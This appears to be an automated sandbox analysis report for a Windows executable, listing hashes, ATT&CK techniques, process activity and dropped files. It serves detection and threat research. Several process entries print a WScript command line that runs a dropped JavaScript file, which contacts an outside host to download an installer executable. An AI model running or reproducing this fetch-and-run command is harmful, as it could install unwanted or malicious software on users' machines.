529d16447d3b5c90f70da4785bc9b046ebe2dcd4310f3cc04a893980de1b5472

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
21-05-2024 15:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe
Size

184KB
MD5

63d5af1b22e6e5a6e1a7ae96c60e3243
SHA1

4461bfe2c262f175c622e6e8124899ee16d00eae
SHA256

529d16447d3b5c90f70da4785bc9b046ebe2dcd4310f3cc04a893980de1b5472
SHA512

5c74bd2941d2eb56240e764ec865d1ea3ea667e69f0c1e96b018e1c27738a010dc7d745704ee6415c5923dbc7ebcf9009ecb6039e6959f8df8cea55444ce8aa8
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3B:/7BSH8zUB+nGESaaRvoB7FJNndn4

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

flow	pid	process
6	1524	WScript.exe
8	1524	WScript.exe
10	1524	WScript.exe
13	1044	WScript.exe
14	1044	WScript.exe
16	2812	WScript.exe
17	2812	WScript.exe
19	888	WScript.exe
20	888	WScript.exe
22	2056	WScript.exe
23	2056	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe

description	pid	process	target process
PID 2240 wrote to memory of 1524	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1524	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1524	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1524	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1044	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1044	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1044	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 1044	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2812	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2812	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2812	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2812	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 888	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 888	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 888	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 888	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2056	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2056	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2056	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe
PID 2240 wrote to memory of 2056	2240	63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe	WScript.exe

C:\Users\Admin\AppData\Local\Temp\63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\63d5af1b22e6e5a6e1a7ae96c60e3243_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2240

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEEF.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fufEEF.exe
2⤵
- Blocklisted process makes network request
PID:1524

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEEF.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fufEEF.exe
2⤵
- Blocklisted process makes network request
PID:1044

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEEF.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fufEEF.exe
2⤵
- Blocklisted process makes network request
PID:2812

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEEF.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fufEEF.exe
2⤵
- Blocklisted process makes network request
PID:888

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufEEF.js" http://www.djapp.info/?domain=czClGJqHby.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0 C:\Users\Admin\AppData\Local\Temp\fufEEF.exe
2⤵
- Blocklisted process makes network request
PID:2056

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
1KB

MD5
df80f9ba75076db634761b6132e0d4e3

SHA1
07983946fb660752c7cccb2ef82d01ec4c9ecc5d

SHA256
d5ff96fd8b416de93a85783192206224cf8821c240cd8ff755f2e8270153dd99

SHA512
4ec734c5d29e9ce00b00e42b627253195e8c7a158433fedfcee428e692a6501981c33d7c8a39235f8b691f087145cdbe660b430493edbeedb12588c5cdd5a66a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize
410B

MD5
270746138b3b4600dedd7f29788dd5b5

SHA1
5a81c768138aa19a226d328c4e3d04544f02480c

SHA256
2a4e6e1dac7946dbcd4a8c8e92c624b6d4ffa551d8a19af5d7b0cb466a7bdf5a

SHA512
6f406de9db1ba3461792ba742430a8e19da5f35ec51e20e66c49c0ba26ea2c27c69e2f249f1ac9eb7473a73cd4c3cf0e97e5f43b3d4e813d8124a5f18ad0214d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
fc7e947a5f0b8d91a47ecdb62cfa9d17

SHA1
fa10c8e52df2a5495e9b034ade50285d5874972a

SHA256
27557d611a78ae895b46fda8db9ad0c30c146e27695ab8a6c5b6778c3e37839e

SHA512
0a39e14f66fe316d3382e19148a15f780f876414fecf98743294d5509fd0d295b5a273893539ba1d1721a842b11d07d4bc2130b21c3335bdc9a52fb754351142

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize
392B

MD5
e67120e3b2b0ed46f23dc2f82d9e7ae2

SHA1
c66a1fe8351a24d405a0dcf4c7899a725b80b37a

SHA256
4c566efacfa4e3f42c61ee007a3ef764ad21d514da44a9f9372494bc8ba63e04

SHA512
67a0d7d214793cfa29969af25a014bb550313b1eb3f7bf2a661a9b2763db3ff9aa03bffcc3c21800f74cf05df0913b181b7186de94e1699bea3d3e1caa122165

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
Filesize
40KB

MD5
5232ef3a315218af89361064ecdfa66d

SHA1
c00a6abd171a90d9e81e35127685afd9c6a2ae27

SHA256
e66a28a590157ecae4cf17e898004b1201f1c400933bc8b9164335c1fa4913f2

SHA512
131a9faa90dcd754340a62789a9f4f5c218d009c1bff7988542df510b4cbddf56ba374b29e5959ca438ccbd845390825bf7e2d1cdc80b57be8e57e32fbf63564

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm
Filesize
40KB

MD5
9060e0d563f22c141329d4abf23d2a22

SHA1
83fc2bea2cccc8b3ca6cc78a2436b0d5de298377

SHA256
7166913a07a1ce71b28227bb9d386125180bb04dc6c8b943e36b7f752a45febb

SHA512
50b783d14afd515ab8fc613785dbbffc8107950684ce7136f858164a60f43cb4e42c2574f085117b3e2b97d77a099bce9d9fbead00f6b1034b98a630f4d44b7b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
Filesize
40KB

MD5
cca7068710631599f4e852079c56bdb6

SHA1
79d2a55e8a5844950b5fed1af5fb5b9d9273f914

SHA256
29a86a195e612ac4eb40779a30e2f4e7cd8cbb2888eea789c7179bc3922fa770

SHA512
8a723816facfda38e5a9a128315041500d83b98e1848493a20163acef02417716d9a306c4bb2dbd1e597f734cd6e4941f9b60191955220604fe97cfc9f5a762f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm
Filesize
40KB

MD5
e3dc281e74cce7635f9f26f25bcec42d

SHA1
51fff5b2e2a12ea784afeb05b85c50402be9c197

SHA256
203fc33d41491f603393c19641e149432a334f65d4feec9ebcce0516c3bcb959

SHA512
589a0fa2988c55f0270851730ec90394e2ab6aaba421b08b466f30f80de04418dea6f60ea009733041c4e408415a0fb84d756905d72c85e3ec83672ed94b8bba

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3F32.tmp
Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar56A9.tmp
Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufEEF.js
Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\EMHG0N65.txt
Filesize
177B

MD5
5ac00008aac3d23f7289c41228f678e9

SHA1
58be947efba9abb6d452c7073afb1b263ec9beb7

SHA256
f48302275866e3b7e41cb22c6af3e0f0097b4e736e402a4a94cd4266b7bb3881

SHA512
6c6da52b9275f65ca301b93492c52dfc712a9a5a00985af218e600ef0b1e3232bda3b352d21382428a151471c3dc43ece18524e12f31a35d8a0ffbe63417c72c

Download Submit